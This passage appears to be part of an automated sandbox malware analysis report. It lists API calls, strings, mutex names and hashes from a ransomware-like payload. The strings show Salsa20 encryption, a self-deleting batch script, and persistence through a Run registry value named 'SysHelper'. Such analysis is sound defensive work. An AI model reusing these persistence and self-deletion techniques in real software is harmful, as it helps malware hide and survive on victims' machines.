                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __wfsopen
                                                                                                  • String ID:
                                                                                                  • API String ID: 197181222-0
                                                                                                  • Opcode ID: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                                                                                                  • Instruction ID: 9e9e5ae8c45c1e688b2ddcdce1ad8e8fbe62f6c79d261f92ad1b57b67856d159
                                                                                                  • Opcode Fuzzy Hash: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                                                                                                  • Instruction Fuzzy Hash: ABB0927244020C77CE012A82EC02A493B599B416A0F008060FB0C28161A673A6A09A89
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000010,?,?), ref: 00E32966
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 626452242-0
                                                                                                  • Opcode ID: 9d0526898472e06688380e8e33d6932b620cf2af80caf1c497ef65fc0f4775c0
                                                                                                  • Instruction ID: 2d787a4e625b5acba92df82e78bbf9d1d15f0ae88247150f87ffd1a001e24b9a
                                                                                                  • Opcode Fuzzy Hash: 9d0526898472e06688380e8e33d6932b620cf2af80caf1c497ef65fc0f4775c0
                                                                                                  • Instruction Fuzzy Hash: 3D11BE71900219EBDB00DF59DC45BDFBBA8EF05714F004169F929A7280D77AAA15CBD2
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • _wcscmp.LIBCMT ref: 00E582B9
                                                                                                  • _wcscmp.LIBCMT ref: 00E582CA
                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00E58568,?,00000000), ref: 00E582E6
                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00E58568,?,00000000), ref: 00E58310
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale_wcscmp
                                                                                                  • String ID: ACP$OCP
                                                                                                  • API String ID: 1351282208-711371036
                                                                                                  • Opcode ID: 264397ca6fb319b3126ee5d72355031512767f781583cf8b41e14fd8e93fb323
                                                                                                  • Instruction ID: e13a8d09d35615e99d4e09dfb5efaf9601a6718adc3ff493552241547e993a13
                                                                                                  • Opcode Fuzzy Hash: 264397ca6fb319b3126ee5d72355031512767f781583cf8b41e14fd8e93fb323
                                                                                                  • Instruction Fuzzy Hash: 7401C035605649AADB209E58EC46FDA3BD8AF06B66F109815FE04FA061EF30DE49C784
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 00E2C090
                                                                                                  • input != nullptr && output != nullptr, xrefs: 00E2C095
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __wassert
                                                                                                  • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                                                                                                  • API String ID: 3993402318-1975116136
                                                                                                  • Opcode ID: ff422d2782e0f87a7921dfcfa40bd00a2fb5a308eaeee6f4b9fb3d9de8d5a549
                                                                                                  • Instruction ID: d6537bcd095a62162e6eb851037e0cb4356e020d7e9439bb079a53c24c11f187
                                                                                                  • Opcode Fuzzy Hash: ff422d2782e0f87a7921dfcfa40bd00a2fb5a308eaeee6f4b9fb3d9de8d5a549
                                                                                                  • Instruction Fuzzy Hash: DEC19CB5E003199FCB54CFA9D881ADEFBF1FF48304F24856AE919E7201E334AA458B54
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 00E324FE
                                                                                                  • GetLastError.KERNEL32 ref: 00E32509
                                                                                                  • CloseHandle.KERNEL32 ref: 00E3251C
                                                                                                  • CloseHandle.KERNEL32 ref: 00E32539
                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00E32550
                                                                                                  • GetLastError.KERNEL32 ref: 00E3255B
                                                                                                  • CloseHandle.KERNEL32 ref: 00E3256E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                  • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                  • API String ID: 2372642624-488272950
                                                                                                  • Opcode ID: aa2911c834a3ec9c8af854798202b23c5ebb699a5573319bfbd742772441215d
                                                                                                  • Instruction ID: 4bdeb4e01025a61323e1603b455ff33f68b87dae31dfa1b8e9b6b3cbc7dc8486
                                                                                                  • Opcode Fuzzy Hash: aa2911c834a3ec9c8af854798202b23c5ebb699a5573319bfbd742772441215d
                                                                                                  • Instruction Fuzzy Hash: D7717D7290025CAADB10EBE1EC89FEA77BCFB44315F100596F609E6090DB759A89CF61
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32 ref: 00E31915
                                                                                                  • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00E31932
                                                                                                  • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00E31941
                                                                                                  • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00E31948
                                                                                                  • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00E31956
                                                                                                  • lstrcpyW.KERNEL32(00000000,?), ref: 00E31962
                                                                                                  • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00E31974
                                                                                                  • lstrcatW.KERNEL32(00000000,?), ref: 00E3198B
                                                                                                  • lstrcatW.KERNEL32(00000000,00F20260), ref: 00E31993
                                                                                                  • lstrcatW.KERNEL32(00000000,?), ref: 00E31999
                                                                                                  • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00E319A3
                                                                                                  • _memset.LIBCMT ref: 00E319B8
                                                                                                  • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 00E319DC
                                                                                                    • Part of subcall function 00E32BA0: lstrlenW.KERNEL32(?), ref: 00E32BC9
                                                                                                  • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00E31A01
                                                                                                  • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00E31A04
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                                                                                                  • String ID: failed with error
                                                                                                  • API String ID: 4182478520-946485432
                                                                                                  • Opcode ID: ec9345847cb786807f1fdf41189b7798b87c182ec8f04df135e634e3a0707e65
                                                                                                  • Instruction ID: 3d8b80c2a30f245a3cabfc1deb7ffeeccc5c4213ed6f4da9d9ca93298c06c560
                                                                                                  • Opcode Fuzzy Hash: ec9345847cb786807f1fdf41189b7798b87c182ec8f04df135e634e3a0707e65
                                                                                                  • Instruction Fuzzy Hash: C1210732A4021CFBD7116B619C8EFAE7E78EF85B11F200059FA05B6290DE745E06DBE5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                    • Part of subcall function 00E749A0: GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000001,?,00E74B72), ref: 00E749C7
                                                                                                    • Part of subcall function 00E749A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 00E749D7
                                                                                                    • Part of subcall function 00E749A0: GetDesktopWindow.USER32 ref: 00E749FB
                                                                                                    • Part of subcall function 00E749A0: GetProcessWindowStation.USER32(?,00E74B72), ref: 00E74A01
                                                                                                    • Part of subcall function 00E749A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00E74B72), ref: 00E74A1C
                                                                                                    • Part of subcall function 00E749A0: GetLastError.KERNEL32(?,00E74B72), ref: 00E74A2A
                                                                                                    • Part of subcall function 00E749A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00E74B72), ref: 00E74A65
                                                                                                    • Part of subcall function 00E749A0: _wcsstr.LIBCMT ref: 00E74A8A
                                                                                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00EA2316
                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00EA2323
                                                                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 00EA2338
                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00EA2341
                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 00EA234E
                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00EA235C
                                                                                                  • GetObjectA.GDI32(00000000,00000018,?), ref: 00EA236E
                                                                                                  • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 00EA23CA
                                                                                                  • GetBitmapBits.GDI32(?,?,00000000), ref: 00EA23D6
                                                                                                  • SelectObject.GDI32(?,?), ref: 00EA2436
                                                                                                  • DeleteObject.GDI32(00000000), ref: 00EA243D
                                                                                                  • DeleteDC.GDI32(?), ref: 00EA244A
                                                                                                  • DeleteDC.GDI32(?), ref: 00EA2450
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                  • String ID: .\crypto\rand\rand_win.c$DISPLAY
                                                                                                  • API String ID: 151064509-1805842116
                                                                                                  • Opcode ID: 3a890f472311f533f4f6515eb3d9332b8a44b58b2ca639546bc2be591735b6e5
                                                                                                  • Instruction ID: 9066ca029b9c749d0384219d8bfa0c46f75bf1ba26bc5c16ccd2959d4a3e740d
                                                                                                  • Opcode Fuzzy Hash: 3a890f472311f533f4f6515eb3d9332b8a44b58b2ca639546bc2be591735b6e5
                                                                                                  • Instruction Fuzzy Hash: CE41B771544344EFD3105B759C86F2FBBF8FF8A710F104519FA54AA2A1E77198018B52
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _strncmp
                                                                                                  • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                                                                                                  • API String ID: 909875538-2733969777
                                                                                                  • Opcode ID: 3cf87cdfda03935c0112378450ceb51e229dd115b439c890353f482b6307b5f7
                                                                                                  • Instruction ID: 9b6df4a3ec58d6b2aaef1db1cba5bb63abfc4dd06b53d66b1c86ba5f903918a6
                                                                                                  • Opcode Fuzzy Hash: 3cf87cdfda03935c0112378450ceb51e229dd115b439c890353f482b6307b5f7
                                                                                                  • Instruction Fuzzy Hash: 2FF1C5B16483416BE721EB74DC42F9BB7D89F54B44F041829FA8CF6283E6B1DA058793
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000001,?,00E74B72), ref: 00E749C7
                                                                                                  • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 00E749D7
                                                                                                  • GetDesktopWindow.USER32 ref: 00E749FB
                                                                                                  • GetProcessWindowStation.USER32(?,00E74B72), ref: 00E74A01
                                                                                                  • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00E74B72), ref: 00E74A1C
                                                                                                  • GetLastError.KERNEL32(?,00E74B72), ref: 00E74A2A
                                                                                                  • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00E74B72), ref: 00E74A65
                                                                                                  • _wcsstr.LIBCMT ref: 00E74A8A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                  • String ID: Service-0x$_OPENSSL_isservice
                                                                                                  • API String ID: 2112994598-1672312481
                                                                                                  • Opcode ID: 411e4e036cca3535eff18f3f87cfd6cb36b6925ad22806dc26cf149449a6fa8e
                                                                                                  • Instruction ID: 14ee78ff1b03f2994cd1b9f436e974fb844e6fd5f54ad321f24809795ef048bc
                                                                                                  • Opcode Fuzzy Hash: 411e4e036cca3535eff18f3f87cfd6cb36b6925ad22806dc26cf149449a6fa8e
                                                                                                  • Instruction Fuzzy Hash: AC31D871A4020D9BDB20DFB9EC46AAE77B8DF44720F109269F91AF71D0FB3099058751
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00E32389
                                                                                                  • _memset.LIBCMT ref: 00E323B6
                                                                                                  • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 00E323DE
                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00E323E7
                                                                                                  • GetCommandLineW.KERNEL32 ref: 00E323F4
                                                                                                  • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00E323FF
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 00E3240E
                                                                                                  • lstrcmpW.KERNEL32(?,?), ref: 00E32422
                                                                                                  Strings
                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00E3237F
                                                                                                  • SysHelper, xrefs: 00E323D6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                                                                                                  • API String ID: 122392481-4165002228
                                                                                                  • Opcode ID: 1477d2251c8e02c82610b16c20b5c723fd059761afdc0023685de258999a3d6f
                                                                                                  • Instruction ID: 1632e735ab443011b5320d60cb51b764f64c90b25ee4bda1c9f7fb2c1989f2f6
                                                                                                  • Opcode Fuzzy Hash: 1477d2251c8e02c82610b16c20b5c723fd059761afdc0023685de258999a3d6f
                                                                                                  • Instruction Fuzzy Hash: F811477290024DAFDB10DBA0DC89BEE77BCBB04704F1045A5B609F2151DBB49A899B50
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • std::exception::exception.LIBCMT ref: 00E6F27F
                                                                                                    • Part of subcall function 00E50CFC: std::exception::_Copy_str.LIBCMT ref: 00E50D15
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00E6F294
                                                                                                    • Part of subcall function 00E50ECA: RaiseException.KERNEL32(?,?,00E6F26B,?,?,00000000,?,?,?,?,00E6F26B,?,00F281FC,?), ref: 00E50F1F
                                                                                                  • std::exception::exception.LIBCMT ref: 00E6F2AD
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00E6F2C2
                                                                                                  • std::regex_error::regex_error.LIBCPMT ref: 00E6F2D4
                                                                                                    • Part of subcall function 00E6EF74: std::exception::exception.LIBCMT ref: 00E6EF8E
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00E6F2E2
                                                                                                  • std::exception::exception.LIBCMT ref: 00E6F2FB
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00E6F310
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
